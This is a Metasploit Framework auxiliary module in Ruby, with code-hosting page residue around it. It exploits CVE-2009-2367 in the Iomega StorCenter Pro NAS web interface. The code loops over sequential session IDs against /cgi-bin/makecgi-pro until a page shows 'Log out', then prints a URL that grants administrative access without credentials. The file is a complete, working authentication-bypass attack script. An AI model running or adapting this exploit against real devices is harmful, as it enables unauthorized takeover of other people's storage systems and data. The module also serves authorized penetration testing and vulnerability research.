62 lines
1.7 KiB
Ruby
62 lines
1.7 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize
|
|
super(
|
|
'Name' => 'Iomega StorCenter Pro NAS Web Authentication Bypass',
|
|
'Description' => %q{
|
|
The Iomega StorCenter Pro Network Attached Storage device web interface increments sessions IDs,
|
|
allowing for simple brute force attacks to bypass authentication and gain administrative
|
|
access.
|
|
},
|
|
'References' =>
|
|
[
|
|
[ 'OSVDB', '55586' ],
|
|
[ 'CVE', '2009-2367' ],
|
|
],
|
|
'Author' => [ 'patrick' ],
|
|
'License' => MSF_LICENSE
|
|
)
|
|
|
|
register_options(
|
|
[
|
|
OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100])
|
|
], self.class)
|
|
end
|
|
|
|
def run
|
|
datastore['SID_MAX'].times do |x|
|
|
begin
|
|
print_status("Trying session ID #{x.to_s}")
|
|
|
|
res = send_request_raw({
|
|
'uri' => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}",
|
|
'method' => 'GET'
|
|
}, 25)
|
|
|
|
if (res and res.to_s =~ /Log out/)
|
|
print_status("Found valid session ID number #{x.to_s}!")
|
|
print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x.to_s}")
|
|
break
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
print_error("Unable to connect to #{rhost}:#{rport}")
|
|
break
|
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
|
end
|
|
end
|
|
end
|
|
end
|